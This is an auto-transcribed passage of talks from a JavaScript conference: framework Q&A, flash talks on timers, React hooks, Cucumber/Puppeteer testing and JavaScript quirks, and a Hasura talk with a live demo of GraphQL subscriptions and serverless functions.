loading the file. So that is a place where you have scope for optimization because build optimization is one part and network optimization is another part. So network optimization has to be treated carefully and we built, we chose a pattern which we found that will be satisfactory for most of the use cases and we replicated it in case. So also we have given flexibility in this framework that the developer, if he wants to, he can deviate from the best practices given as well. So for example, in one of the projects, the certain type of bundling was different than all the other one-web projects. So what we have given is, we haven't implemented a very extremely strict guideline so that developers don't have any flexibility in terms of evaluating their needs. So in this case, because of one-web, the way it is designed, I can implement the best practices that are there and yet if I see that, if there is some other best practice in distributing the file, that is there. That is available. And in terms of framework-related components, so if there are any new components, I'm sure you will pick it up and it will be available to us as well. Hey, so is this one-web framework open source? Are you planning to do it? Oh, it is in consideration. Okay. Hi, thank you for your presentation. So you told me, told that with one-web, you could essentially reduce the amount of, or rather break the Mythical Man month paradox, right? But how much time did it take for you guys to actually develop the framework in the first place? So I don't have a, I mean, I think it was around a month, less than a month of effort. We were around eight engineers working and we were already had the past experience in web performance tuning. So we were able to get it out. Actually, I think it was around two weeks. So we had one week of discussion and around one week of writing the build system and all of that. And third week and fourth week, we just spent in writing out a POC application and running performance metrics, I mean, checking its performance metrics. Hi. So I worked on React and Angular, both Angular 2 Plus. So thing is like the way you're saying like web component driven project or unidirectional data flow, that can happen in both of the technology or framework. So I never had experience with Vue for sure. So I know there's pros and cons of both the framework for sure. And there's a theoretical or bookish knowledge which I have regarding Vue also. How is it better? Or what improvement has been made, you know, in terms of like while developing the Vue. So thing is as your personal experience with this one-way project, what's your take on this particular frame? How is it different in terms of real exposure or experience? How is it different from these two particular frameworks? Or if one has to develop a project or start a new web project, why one should consider Vue in contrast to React or Angular? So to repeat this question, so he's saying that Angular, he's using Angular 4 and React and he knows it well and they also have certain features that are mentioned here. So suppose I'm going to create a new project. What is the difference of learning curve in terms of adopting Vue or why should I adopt Vue? So this, so first of all, you need to see who is your target audience for who is your consumer. So is your traffic going to be heavily mobile? First traffic. So if that is the case, then you need a framework that will, like I mentioned, you have 130 to 150 kb of data to be sent. So you can evaluate whether your given framework will fit that budget because you also need to send application code. You cannot send 150 kb of your libraries and then again ship another 100 kb, 200 kb of application code. So you need to evaluate that parameter first. Next, you also need to see developer experience. For example, some people like developing in JSX. Some people like TypeScript. Some people like raw HTML, CSS and JavaScript. So it also depends on your development speed. What sort of engineers do you have? Do you have time in spending some time for performance tuning? Do you have, or you want, I mean, even if it is slightly less performance, it's fine, but it should run out of the box. So if that is the case, like, so that is where you'll have to create your own matrix and decide. So I wouldn't say that, you know, only this framework is good or that framework is good. You need to come up with a matrix and then develop on that. What remains same is that your development philosophy. So that should not, that for me, that wouldn't change. So the way we distribute and all of that, that is based on certain research, well-researched performance guidelines. So based on that, you would be able to choose. So as coming to UJS, how easy is it to adapt? It gives a lot of healthy defaults and you don't have to think a lot. So if you consider Angular or React, the one non-functional difference I would say is that you need to know a lot and understand certain aspects before jumping into Angular or React. But with Vue, it gives you a good amount of healthy defaults so that you have a decent amount of web performance right away. And also the Vue is a progressive framework wherein, like I told, even our single category launch web page, wherein I have to put certain small components, I use Vue. Also a large-scale application, I still use Vue. So Vue is versatile framework that scales well with the various needs. So Vue has certain advantages compared to others. Excuse me. How we can bring the concept of CSS pre-process like a source less with this single file component? Sir, we're out of time. The speaker will be available offline. You can continue there. Okay. Let's thank him. Okay. Thank you. Okay. So we're starting flash talks. Simple rule, five minutes each speaker. You can do what you want. So our first speaker is Riyaz. I'm not introducing the topic. Let that be a surprise. I was not sure if this is, this is called a flash talk or a lightning talk. So I have both of them on screen, right? Between both of these. My name is Riyaz. I head the offensive security team at Apsaco. Essentially my team hacks into apps and servers host on the cloud and stuff. That's our blog. That's my Twitter. That's the company Twitter because I have five minutes. I'll quickly go to the topic. The topic is go home JavaScript. You're drunk. Okay. I'm not a developer. My essential role at the organization and all the experience I have in breaking stuff. Right. So let's see what I'm talking about. This is going to be interactive. Okay. All of your developers here. I need answers from you folks. Right. JavaScript has five essential object types. Right. The strings, bullies, integers, objects and arrays. Right. Let's start with numbers. So if I have an integer two plus four, what do you get? I mean math. What do you get? Six. Everybody says six. I have two minus four. What do I get? Minus. Okay. If I have not a number, which is, which belongs to according to the ECMAS spec belongs to the integer category. If I have NAN minus two, what do I get? Okay. If I have two minus NAN, what do I get? NN. Okay. If I have NAN minus infinity, which is also a number. What do I get? NN. If I get minus infinity plus NAN. Okay. Numbers are clear. Let's move to strings. I have the string ABC. Okay. I say ABC plus I do the same, but the change the order of the operands. How many is the object of it? By now you'll have realized the answer is not going to computer. You get zero, which is the expected answer. Now all of us, most of us, even from the security community are very familiar with the alert zero. It's the common POC that is used to show that you have XSS in your app and stuff. Now, when you, because, because it's JavaScript can be used to compute these strings, like literally character. Wow. I just wanted to give me, I'll just type out the whole internal typing and just copy out the whole thing. I have 10 seconds. Is it okay? I should have submitted this as a talk. Is it? What do you think this is? What do you think this is? It says alert zero. So I can choose to evaluate this. Okay. We also have a BOF session on Vue.js, which is starting about in the next five minutes outside. So, you know, it will be like a continuation, anything related to Vue.js if you wanted to ask, which you couldn't ask, you guys can ask. Next up we have Ashish. Hello. Yeah. Hi guys. Okay. So I have a very simple use case that we are solving. Like we were just coding and I came across a simple use case. So I wanted to just discuss since it's a flash talk and only five minutes I have. So like it was like, okay, I'll show the multiple timers at 60. Yes. So I'll show you what is it about. Okay. Okay. How much time is left? Okay. Where did my browser go? All right. What is happening? One second. I am not able to throw this. Okay. I'll do a duplicate screen. I'll do a duplicate display. Okay. I'm really sorry about that. Yeah. Okay. So this is the kind of use case we were solving. We were, you know, making this widget. So it's a pretty common use case, you know, like e-commerce website. We have this widget and there are multiple timers running, right? So now a naive approach will be, you know, to just set interval, like user set interval and like multiple intervals running. The problem is that, like, if I have around 20, you know, products and 20 timers for those products, they'll be like multiple callbacks running at every second and there'll be multiple layouts and pains within a second for the browser to handle. And that will be too much for the browser to render at 16 milliseconds. So yeah, the performance does matter. And especially now that we have released a PWA, we really need to focus upon, you know, achieving that 60 FPS. So what is the solution? Like, how do we manage so many timers? Like these can go to 40, 50 timers. Like how do we manage so many running so many timers at the same time? And yeah, the solution is simple. It's intersection observers API lights, like newly launched in Chrome. And that's what we used. So I'll just quickly show you what is happening here. So if you see the timer, right? It's 1137. I move it here. All the time has stopped. Only the timer that is currently in the viewport that is running. And then when I go back, it updates. So 10 seconds it makes a jump. But yeah, it didn't run for that interval. So the only timer that is in the viewport is running. So that way I can have thousands of timers and it will be 60 FPS. So like these are the small things we need to take care of, right? Especially now that web has to match the performance of the apps, PWA is around and these all kind of things that we really need to look upon. And we just cannot, you know, because if you don't use our intersection observers, the FPS will drop to around 510 FPS. So that is the use case I had which I had to share with you. Okay. Next, an ultimate flash talk by Siddharth. Is it already on? Is it already on? But now you can't see anything. So here's a free startup idea. Make a projector that just connects and start work. How do you... Okay. Thank you. Sweet, finally. Okay. Everything's super small. So I'm going to bump it up. Okay. I'm going to put five minutes for myself. Who here uses React.js? Just like a quick raise of hands. Awesome. Most people. So it's not a JavaScript conference unless we talk about React, right? And nobody did until last. I'm like, cool. Let me be the guy. Let me be that guy. How many people don't work with React? Like any other framework folks? Awesome. So I'm going to try to teach you React super fast in two ways and one of them is going to suck and one of them is going to be really good. So there's something that the React team launched just yesterday. So I'm quickly going to show you what it is. The idea is, I hate classes, so I don't want to write a single class ever again. This makes that possible. So it's cool. Okay. I have this number badge thing. It's like a plus minus, right? It doesn't really work because you have to write code to make it work. So feel free to shout at me while I make mistakes. So what, how do you actually make that work state? Cool. So to use state, I need to use convert this into a class components. I hate class components, but I need them. So I do this and then I need a render function. Right. I do a return. I copy this gibberish. I delete it. Hopefully it still works. Awesome. So yeah, then you need a constructor, right? So that you can declare state. So I'm going to declare a initial state of count zero and something broke already. Can you even tell me why? Super. Yes. Which I shall never remember in my life. So now I can delete the zero put this dot state dot count. That's cool. Now I need functions to add and subtract. So I'm going to have a function add. Let me use other functions. Oh, this is a class. Sorry. Add in add. I'm going to do it. This dot state where I can say count is this dot state dot count plus one. I'm already tired. Subtract. Subtract is I can copy this minus one. Awesome. And now I can say on click is this dot add. And on the other one, I can say this dot subtract. So this is how you build a counter component. This is like the hello world of handling state or handling data. So you do plus one and it breaks. Oh God. Yeah. So you can do bind this. It's stupid. Or you can use this fancy auto function thing. Awesome. These work. Awesome. So I do a lot of beginner react workshops and imagine explaining what a constructor is. Why do you need super? What is binding? What is this? Right? Explaining this to people is super hard. So I basically hate classes because I have to teach people classes. So yeah, I'm going to basically just discard all of my changes and we're back to a simple function that doesn't work. So they launched a new feature yesterday, which is called use state. Right? They used a, they launched a bunch of hooks called use state, use effect, use, blah, blah, use state. How you state works is inside your function components. You don't need class to have state anymore. You can call you state and give a default value like zero. It gives you two things, a value and a set up a value. I'm going to call it count a setter. I'm going to say set count. And so now I have state in my application. I can change the zero to count. And I'm going to write add function. So once add is a function which says set count to countless one. That makes sense. And subtract. I can say subtract is count minus one. And now I can use this ad over here. Say on click on click add and click on the other one. I'm going to say subtract and it works. So you can use state inside a function component and it looks super pretty. You don't have this. You don't have a constructor. No super. None of that bullshit. And it's super easy. So I can actually confidently teach this to people and it won't be a pin. Um, now you're like, yeah, so that nobody writes code like this anymore. Come back from 2005. Everyone's doing redux and reducers now. So cool. I have a reducer over here. I'm going to use use reducer, which is also a state hook. And in my component, I can say, um, I can say const state and dispatch with a use reducer where I can pass the reducer reducer and pass an initial state for me. It's count zero. And then I can use state dot count. And instead of add, I'm going to say read a function and dispatch this whatever over here is. Do the same for subtract track. And you can have reducers and they still work with this stuff, right? So you can go to react.js.org slash hooks and you'll get an intro to hook. There's like a huge awesome thing. You probably never have to write a class again. I mostly am not, um, also I'm out of time. So thank you. Okay. Our next flash talk is from our MC, Nitesh. He wants to talk about the types of people you meet at conference. So let's get round of a plus by the time he sets up. So perks of being an MC. You get to do this. Uh, so I'm going to talk about types, not the types we use, but types of people you end up meeting at a conference. Okay. So we had a lot of tech talk today. So this is like more of a people talk, person talk. And, uh, over the last whatever, uh, few years that I've attended, I've like sort of categorized people, no offense meant to anyone, but, uh, the types of people you meet, you know, at these conferences. So the first, uh, what I call this, are the intrigued, right? The people who come for the first time, uh, get to learn a lot of stuff from the speakers. Uh, but the thing for you guys is what you can probably realize is if there are people talking up here, you can also be one of them. Uh, if they're implementing something in their company, it's probably you have also done it, but, uh, these guys are here on stage. Uh, a number of times, uh, first time speakers are, uh, scared because they feel you know, stage fright. There are going to be so many people, uh, you can get rid of that. Uh, you're in Bangalore. There are meetups in almost every language, every framework. Uh, you know, all of them have Twitter handles, contact, uh, some of them, you know, get started with that. The next, uh, is who I call the Gyan Baba. Uh, you will have people who will give you opinion on everything. Even if you've not asked for it, uh, you will meet people like that. And, uh, for someone like when I first started talking initially, this can be very intimidating. Uh, so for people for you, Gyanis out there, uh, if you've realized that a speaker's probably made a mistake or has not, uh, you know, stuck to your architectural design patterns, uh, rather than asking him a question, counter questioning, counter questioning again, maybe you can go out, meet him outside, have a healthier discussion. Uh, you know, it's a lot better. Uh, also gives more confidence to first time speakers. Next, uh, the personal favorite of the category that I belong to are the trick or treat, the guys who come for the stickers, the t-shirts, the, all the good stuff that is outside. The cupcakes also today, which were very nice. Uh, the next one after this is the Godfather or the people who want you to work for them, trying to tell you that, hey, uh, we're doing this thing, maybe you can work for us. Uh, you'll find them also outside. If you're planning for a career change, whatever it's a good time. Um, another one, you'll always find the manager who will be there. Uh, silently, probably while discussing something with him, just slip it across that he is engineering manager of some team somewhere leading something, hoping that you've caught on to that. When many times you don't, and then, uh, my favorite, or I hope I think most of you guys might also be in this thing, which is, uh, work from home, right? Uh, everyone's put that in their office today or something like that. And, uh, they're over here. Uh, oh, it's a nice escape route. Plus you have to, uh, like a Friday and then you get a long weekend. So yeah, that's about it. Uh, that was very short and sweet. My name is Nitesh. Uh, it's my Twitter handle. I do a lot of ranting on Twitter also to end with a note. Nice. Okay. We have time for like one more flash talk. Hey, just give me a sec. Yeah. So, uh, my talk is about, uh, just a little thing about, uh, an integration test that I wrote with, uh, Kukumba just in perpetrator. Let me quickly introduce these terms. Kukumba, right? It's just a simple collaboration tool, mainly. What it looks like is this. So imagine you have a login feature, right? Your product manager comes and tells you, I have to write login features. How will they tell you what the login is? They'll be like, I'm a registered user. I log in with some ID and password and I'm getting redirected. That's my login flow. Or for example, Google search. You search something you should land on the login page on the search page. Right. So this is all very natural language way of writing your features. Right. Now, uh, what I do is I convert them directly into code. I will take this, put this into my code base. So you see right there. There is the login dot feature file. So it will show you like the same text written in proper three lines with these keywords, given when and then what this converts into in the end is this. So it will look like this. Given I'm on Google.com. So you can just launch a environment of Chrome. This is something I use called puppet air, which is made by the Chrome team. So what you can do is just go to that page page. You can define here as Google.com. You wait for an input box. You can enter some text in that. So let me show you some actual live example running. This is a quick video I made of the example. So this runs the test and shows you. It opens the Chrome. This is happening on its own. The Chrome is controlled by automated software here. As you can see. So it opens the Chrome. It will go to the website. It will wait for the input box to appear. It will enter the text. Click on login button. Take you to the URL test that the URL exists and then exit the test. As you can see, it's happening a little quickly. The test failed here for some reason. We'll have to investigate. But yeah, what you can do here. What I've done basically is I did this. I have an input selector. I use CSS to select it. I enter some text here. I expect the page to fill this. And in the end, I expect the page to contain this. So all I'm doing is testing the URL right now. You can do any kind of test. You can test for any part of the page, any CSS. And what lets you do this is two things. Cookomber and Puppeteer. Puppeteer is just a headless environment. Runs in node. So you can actually integrate this whole thing into your CI pipeline. If the test breaks, you can ask it to take a screenshot for you. You can ask it to tell you what exactly broke. And you can see a diff between the two things that broke. So you will get two screenshots showing what has to be and what will be. What is the actual thing happening right now? So anytime you release, you can actually run this on your pipeline. Make sure nothing breaks visually also. Not just your unit test. So this is how we write integration test at the place I work at. I work at this company called Locus. So just a quick look. And yeah, the Puppeteer also lets you have, capture all these metrics like performance test or network calls. You can test your APIs using directly this. So yeah, it's a very quick tool that you can. This I came up with this in like a couple of days. So doesn't take too long to implement is very useful for your pipeline stuff. That's all right. Thank you. Thanks, Kalash. So our next speaker is a polyglot and he loves cooking. So he right now so far we have seen so many front end, one web security and stuff, right? So you might be wondering, what are the back end, how it is getting developed in nowadays? Like there is something called GraphQL serverless and order the ES6 features in node back end too. So let's see how we can develop scalable NodeJS applications in a back end. Shahid. I'm Shahid. I work at Hasura and I tend to shamelessly plug my Twitter handle everywhere I go. So please follow if you like what you see here today. I'll be writing more about these things. Cool. So I work for a company called Hasura. Most of you might have got Hasura stickers and would be wondering what it's about. I'll come to that towards the end. And I would like want to start the talk by reducing a problem. This is something that everybody would be aware of or you have seen in your life at some point. Before that, can I see how many front end developers are here? Just raise your hand. Okay. Awesome. Back end developers. Cool. Is there any other category of developers here that I'm not aware of? Full stack. Okay. Who is full stack? Okay. Grass stack, jam stack, a lot of stacks are there. Okay. Any GraphQL users here? Serverless functions, function as a service. Awesome. Okay. So most of the stuff might be new for a lot of you, but that's the whole point, right? Cool. So let's see how we can build a typical application. You have mobile app or website or something of that sort. And you will be contacting an API layer, which will be talking to a database, which will again be talking to multiple other microservices. Or as always, there's the monolith where everything is there inside. I'm not going to that part because hey, we are in 2018, right? Like monoliths are what, 1990s maybe? Anyway. So you have this microservices talking to each other and this particular microservice that I'm introducing here, we'll be using them throughout the talk and towards the end of the also. So just keep them in mind and you might have guessed already what this application does, right? Let's you order food. So any, any thoughts? What kind of issues this architecture can have? I'll give you a clue. Two of those issues are in the title of the top. Any random shout outs? Huh? Yeah, scalability, resiliency, but why? Why is it not scalable or I'm assuming that it's implemented in a naive way. Okay. Of course, you can make this scalable. I mean, all of us can do this, but I'm talking about the naive way of doing stuff where you make a request from the application. It hits the API layer, API layer does everything that has to be done in this case. It's it makes an insert into the database validates the order or process the payment and assign a delivery agent. And after doing everything, it returns back to the client. Right? So this is a synchronous action. You are doing some something on the client application. It's going through the entire flow on the back end and then coming back to you. Okay. I'm talking about this scenario. This particularly is not scalable as always. Do we all agree to the fact that synchronous actions are inherently not scalable? Like you can't do thousands of them at once unless you allocate the required resources, right? We agree. Anybody disagree to the fact of all of you don't have very strong opinions or trying to be very liberal, post your nice snap after the lunch. Which one is it? Okay. Anyway, so resiliency is something that you build into the application there. Right? So what happens if the restaurant microservice your interaction with the restaurant microservice fails? Like you need some that microservices crashed? Like how do you start the process again from that point it failed? Right? This is something that you typically build into the app. You'd write code to do this. Now a typical solution to this problem. When we see that most of my issues are due to synchronous things happening in the back end. What is that golden hammer that comes to your mind? Let's make it. I think, right? Let's make it a sink. So now I'm making it a sink. Let's see how an asynchronous architecture look like. So you have the IP layer again. You have the database and you make a insert. Let's say an insert in the database. You have something like an event system. Like you will keep inserting events. Other microservices will consume these events. They will process what is meant to be done. Right? Any of most of you are familiar with this architecture. Right? Yes? No? Yes. Okay. Awesome. Cool. So this is the typical async architecture that we see where you have, you interact with the database. Your state is stored in the database and you execute certain action based on events happening on the database. Right? Nice. But microservices are again like monolith. So 2000, right? Maybe like last year. What is that about serverless? So let's talk about serverless a little bit. So my aim is to replace my microservices with serverless functions so that I don't have to take care of a lot of things. Right? So I saw there are very few serverless users here or functions as a service users here. So let me just introduce what serverless is or what this lets you do. Right? Typically when you need to write a web service, you need an API which tells you hello world. So this is my express code for that. Typically you would write this function and then you will have something like app.use or app.listen and you will maybe run this on a typical VM with PM2 node whatever just write it right around it. Or if you are fancy enough, make it a container, talk a build, talk a push, maybe put it on Kubernetes. Right? So serverless functions or serverless frameworks or serverless platforms, what it lets you do is this. You typically have a command line tool or a UI where you just paste this function or you just execute one command which will take this function which is in one index.js file and it will give an endpoint to trigger that function. So this will give me this URL and I can just call that URL and I get the response. So it's scalable by default or scalable by nature because you are not managing any CPU RAM or anything. There's no ops. You did not deploy the code. You did not access it into any VM. You did not create any servers. You did not care about CPU or memory and it just works. Right? So there's no VM to manage. Don't need to worry about scaling and all serverless platforms are scalable by default. You will only talk about the pricing page. You look at the pricing page and you'll say free for a million invocations a month that itself sounds like scale. Right? You can trigger it how many of the times you want concurrently. You can trigger it once twice or 10 times at once. So scale for free. I said most of the cloud cloud platforms like AWS Lambda Google Cloud Functions Azure Functions all of them are very generous free. You will be able to deploy these two very generous free tier which is like a million invocations per. So this is freedom. Right? You are most of us are front end developers. Full stack developers are here. I just want an API to be available for my app to work. I exactly know what it does. I don't want to go to the hassle of creating a VM deployed and do whatever. Right? I know the function. I know how to write that code. I just want this code to be running somewhere so that I can trigger it using an API call. But is it resilient? So we talked about scalability. Is it resilient? If some serverless function fails, how do I restart the same action? How do I trigger the same action again? Right? Serverless functions by themselves are not scalable, not resilient. So what you have to do is you need to throw in some idea of state because they themselves are ephemeral. You don't have any idea of state. So you store your state in the DB database. For example, in the earlier case, you say payment done or not done. You store it in the database and whenever something changes in your state, you trigger events. You trigger the serverless function on this database events. So what that means is you when you have this event system and you try to trigger the serverless functions on this events, you and add interest to the mix, you get resiliency. Let me explain that by taking an example. So here in the earlier example, we have this food ordering app, right? You have this schema. This is your table. This is what your order table looks like. And now you create a new order. This is the state, right? Now there are four steps here, which is very important. One is valid. Where the restaurant does the validation. Another one is paid is approved and is agent assigned. Let's look at the flow using the serverless architecture. A new order is placed. Now this is the database state, right? Everything is false. This particular database state will trigger an event which will trigger a serverless function, which does whatever logic is required to validate the function. Now that will do the act, whatever logic that is required and comes back and updates the database and says he's related to this particular action or this particular event of is validated being updated through will trigger another serverless function, which will again come back and update the state and which this kind of these things. This continues over all the steps, right? And finally, when everything becomes true, your order is completed. Now your client just created an order, right? You may place an order from the client. And what happened is you replaced your earlier synchronous microservices architecture with serverless function. Your microservices become serverless function. Serverless functions are asynchronous and scalable by nature. And when you trigger them using database events, you get resiliency. But what is the cost, right? You don't get anything for free. You can do all these things. But what is your cost to do this? Nickloos, like you talked about event system and all, like select something that is available on the road. You can pick it up off the shelf with it, right? What you did was you moved specific error handling or failure handling logic from the API layer of yours to another system, the generic failure handling system, which is the event system, right? The cost is in this asynchronous architecture. You need a generic event system which will be able to trigger microservices or serverless functions or whatever, some webhooks or some logic when database actions changes. And you need asynchronous serverless functions. So what we did was we took this architecture, we took the synchronous portion of it. We made it asynchronous by introducing this new architecture. Again, what's the catch? This is still a problem, right? Your client made an order earlier whenever the order was completed, the client got an update back. Now, whenever something is happening on the backend, how does the client know whether the order is validator, order is placed? You get a response immediately when you place an order. That's what we showed here, right? You make a database insert, you get a response back. So how does the client know what is happening in the backend? So how do you send this asynchronous thing that are happening in the backend to the front end? So GraphQL is like this new person in town. So very few people knew GraphQL, so I'll just make a small GraphQL intro. So you have a typical rest, in a typical rest scenario, you will have this product or this particular endpoints to which you do get, post, patch, all these requests, right? All these methods. And you get response back. So if there's a product and you only want to get the name of the product and nothing else, you would, the backend has to implement something like columns equal to, customer columns equal to name or something similar, right? So using GraphQL, the query looks like what is there on the right-hand side. You write something called a query and you say what is it that you want to query and you get what exactly you asked for. And if you want to query over multiple relationships in a database, this is how you do it. You test them inside the same object and you get that response back. How many of your React developers? Angular? What are the rest of your views? View? Vue.js? How many? Okay. How many of you? Still jQuery, huh? It's 2019 almost. So React has, React and all these modern UI frameworks have this UI or component-based architecture, right? You write a component, you use the component everywhere, you reuse the component. So when you have a component, let's say you have a profile, use a profile component. You need to know the user's name, a link to a profile picture and let's say the user's location. There are three things that are needed to render this profile component. So you can write a specific GraphQL query to only fetch this information. Profile, name and the image link and the location. And you can wire it up to the component and that's it. Your library will take care of everything else. You don't have to get the response from your REST API, transform it to what you want it to be to pass to the state of your component. All of these things go away. And whenever you want something else to be done, like how many times has it happened that you were working on a UI component, you wanted one more extra field from the backend and you had to call the backend developer. They were like sleeping or I'm on vacation, I'm on leave, I'll do it as soon as I'm back and your work gets put on hold because of that, right? All these backend front-end interactions will go away in this scenario because there's one endpoint which exposes everything, of course everything that is allowed to be exposed and then the front-end can decide what they want to see exactly, what they want to query exactly. So this kind of puts UI first. You decide what your application needs to see or what your application needs to show on the front-end and depending on that you do the database modeling or you write the right query to get the correct information. The amazing thing about GraphQL is subscriptions. Now we talked about all these things that is happening in the backend where the order was being validated and you need some way of sending this back to the client, right? That's what we stopped earlier. So you need some way of consuming Essing information from the backend without worrying about too much stuff. So you know that REST has a watchword. How many of you have seen this watchword or used it somewhere? Squinting at the Kubernetes users out there. The Kubernetes has this watch method. It's not a standard spec, I guess, but they have implemented it. It let you watch over a resource. Basically it will open a web socket connection and sends you updates over that web socket connection. GraphQL subscriptions are exactly like that. You have a database. You will be able to send information to the client. Not when the client asks for it. That's how REST works, right? The client asks for it, you give it back. The client uses, let's say the client opens a subscription. It's like a web socket connection. It is a web socket connection. And you will be able to send data from the backend to the front end using GraphQL subscriptions. For example, this is our food ordering example. You had payment. This is the order table. You had two fields. Payment is payment and dispatched. Over time, both of them becomes true. You want to show this on the UI. Hasn't when it happens, right? What would you do? All the front end developers? Like you have no idea about GraphQL. Like how would you do this? Polling. First solution is polling, right? You keep polling the backend, REST API at a particular interval. Somebody said sockets. Now sockets are not something the friend developer alone can do, right? Polling the friend developer alone can do. Pardon? Real-time DB, yeah. Can you name one real-time DB? Firebase. Anything else? A lot of your couch, couch DB, reflex, rethink DB, a lot of real-time databases are there. How many of you are all actually using that? Firebase, I agree. Many might be using. But other stuff? Firebase is a non-SQL database. We need to take that into consideration. So, the second solution is to use web sockets. There should be a contract between the front end and the backend. Both parties need to decide on a common contract to send data across, right? Again, the same problems of REST API comes here. What if you want to get one more field in the web socket response, right? You need to again paint the backend developer. So, you do polling, you do web sockets, custom API, but those who have implemented web sockets would understand community is really fragmented. Socket.io and all is there, but still have you tried making a JavaScript client talk to a... maybe the other way. So, integrating different frameworks and different tooling is very difficult because the community, there's no set standard which says this is how information should be passed around through web sockets. It's up to the developer to decide, right? The front end and backend developer decides this is how we are going to do it. Or most of the times one party decides, right? Other one has to just do it. So, with GraphQL, this comes down to very simple mechanism. So, the spec is standardized. Everything is set on or in one GitHub. Where the spec is written, this is how the client should interact with the server, this is how the server should send the information to the client and all clients implement this spec. So, all clients are compatible with all servers. If the server says I'm GraphQL compliant and the client says I'm GraphQL compliant, it works. This means most of the work is already been done by the open source frameworks and libraries out there and you just have to implement it. You just have to use it. This is what boils down to when you have when you have to do the thing that I showed you earlier. So, it just becomes this. Instead of the query, you will say subscription. That's all. Your React framework or your React library it's called Apollo in React. Most people use Apollo and it will be it will get the update from the backend and will refresh the component automatically. So, whenever any of these things happen in the backend you will be able to get that update in the front end. Now, of course, you need a GraphQL server with subscription, right? So, we took our simpler architecture earlier and made it so complicated and we need all these new things to be done. So, going back for a comparison this was a traditional architecture. We said that that is not scalable because it was synchronous. This is my asynchronous scalable architecture and this is my GraphQL and serverless architecture. So, you have an application and you have something sitting here. You have it interacting with the database and you have GraphQL client is interacting with the server with GraphQL. Server is also triggering serverless functions based on the actions happening on the database. Which is again updating the database back and forth and so on and so forth. So, some fun, right? A lot of theory, some practical stuff has been done. Cool. But I hope this works. I heard there is confidence Wi-Fi. Myself, I am connected to it. So, let's see how it works. Why don't you go and scan this QR code? You will be taken to a page which says order app, analytics app. Preferably go to the order app and we will come to the other ones. So, how do I do this? So, what I am going to do is this is an example application built to demonstrate this scenario. So, I will also do one. But it is already messing with the some. Okay, so I will keep this on one side. Other stuff on the other side. So, guys, so when I place a new order what happens is I will be able to see the status in real time. Whoever is placing this, thousands of orders please make sure you pay for the order. Okay. Otherwise it will be just stuck there. Nothing will happen first. So, this is the number of orders being placed. And now this bottom graph are the number of orders being validated. Okay. And then the payment happens. Then so and so forth. The validation and the restaurant approval happens. Now, while this is going on we can stop ordering and please listen. So, I would just like to show you what's happening here. So, this is the code. This is a react application where you are placing the order. So, there is this place order.js function where you are just doing this thing called mutation which is inserting an order item, right? When you place choose the item, it is inserting into a database. Now, all I did here is to write this query and this on click function is bound to we saw that like me talk how this happens. So, whenever the order is placed this is how it happens. So, this is how the items are loaded. So, you say query and you say return you will render the item name in a checkbox. So, compare this to how you would use a rest API. You would use fetch, call an endpoint get the response that responds back into the state and then render the component, right? So, here you have a component called query that is available and it just have works right away. And this is how you are placing the order mutation is place order and the order gets placed right away. So, whenever you want to see the status of the order this is what happens. You have a subscription. This is the live status. Your order keeps getting updated. This is these are the fields that I want to show and these fields are mapped to the component right away. So, here you can see payment status is shown and the subscription component is being used here and based on that I am rendering this template and the status is rendered by this one. Now, when you place that order wow nice please please play for these orders otherwise it won't move over. Okay, I am being generous. I will pay for all of you. So, this is what is happening in the back end. There is an order table and whenever you place an order send me who is L-E-L-L-O-O-O I want to see this person please raise your hand the one who is messing with my demo reveal yourself please No? Okay, we will find you. So, server. So, when you place a new order what is happening is this serverless function is getting triggered. So, this function is hosted on Google Cloud where you can see validate order you can see the number of invocations for the last one hour. So, it is going pretty high right now. So, whenever you are doing any action here the corresponding serverless function is getting triggered and you can see it is climbing slowly. So, this is partly because Google's invocations per seconds are very low like 16 server requests per second and you can see that as I know it gets time it happens. So, let's try to pay for all these orders oh my god this person So, I am going to pay for all the orders. So, what I am going to do is I am going to update the order table and set is paid to true where is validated is true. So, those who are familiar with GraphQL will understand what this is and once that is done tell me how many rows were updated. So, I can execute this query and it will tell me how many rows were updated. So, 18200 orders have been paid for. So, you can see this massive jump here right this green jump is due to the orders that have been paid right. The valid order function is still being very slow in getting invocated. So, I will have to resort to my videos because of our said question who is placing infinite orders. So, we saw how we can place one order and whenever we make many orders this is the ideal situation would look like. So, this is what happens right when you have a system and you didn't design for the kind of scale that you expect even if you call the even if you call it scalable resilient whatever you need to have an anticipation of that scale last time I did this demo I got around 40,000 orders and I was under the same impression but yeah you guys are really awesome. Not you guys or everyone that one person. I will find that one person. Okay whoever you are come to me after the talk is done I have some gifts for you good gifts. So, the idea is whenever so this is the ideal scenario the validation will go on. So, I only managed I only configured this to handle such a number of scale. So, you will be able to see the validations are going on and whenever all of the orders are pending payment so when you pay all orders suddenly the payment thing jumps and the other step which is the restaurant approval continues to happen and once that has reached a particular state the next function which is the delivery assignment will continue triggering. So now, imagine building an application which can handle 50,000 orders this kind of scale and all if you have to handle this you have to work I don't even know how much this is just like front end hacking just a couple of react lines and one database model that's it done. So, let's say when your network breaks down that I don't really show you that on Google system because there's no way of turning off the function. So, I'm making some orders so I have paid some 1000 orders and the validation is happening and payment has also happened and this is my restaurant approval function this is on AWS Lambda this is button called throttle throttle button and the function just drops execute you cannot execute it anymore. So, these many approvals have been done and this many approvals have been done and the function has been throttled by this time and this many restaurant this many delivery agent assignments also have been done. After that just flatten or nothing is happening because this function cannot be triggered anymore. So, once that so everything is stuck at restaurant approval so once I have I make the function run again where is 1000 concurrency have allocated to it it will start running you see that it start running again and everything continues as expected. So, there was a network failure in between and because of that network failure everything stopped executing but it picked up again when the network was available. So, that is how the resiliency is achieved so you can see that all of this you can see all of this invocation logs and everything where if you go to the events tab you see the validate order function you can see the invocation logs so you can see that this particular event was delivered this was the response this request is a response and see what the order status is are we still getting spammed with orders looks like it stopped. So, keep a watch on this link this analytics app link after the talk is over also you will see that how the system will handle the scale without any intervention. So, I have not done any tweaks which matters this particular amount of load this was something that was working for 1000-2000 orders and see for yourself how the system will handle it. It's nice to see all this in one talk but we have also formally or not formally just put it down in one place if you can go to prefactor.app and you can read about all these principles this architecture principles that I have just introduced right now. So, we use real time GraphQL for faster iterations we use event revert for resiliency we use async serverless for scalability so you can check out this link prefactor.app and you can learn more about this architecture that's it, that's it from me the product that I use right now for Suda GraphQL engine that is what we do we build GraphQL on Postgres check out the GitHub repo star eight it's open source we released this three months ago and we have got a huge response it'll be awesome if all of you star it and show them show us more love have you guys got the stars from school like notebook they'll stick stars right very good star not saying the same thing but that's how we feel anyway please meet me after the talk any questions what do we have time for questions let's take a couple of questions and we'll definitely star your repo please show the same enthusiasm you've shown to place those orders if you did that we could get some 200, 300 more stars hi so you have talked about what are the actually benefits of the GraphQL and how it is like handling so many orders 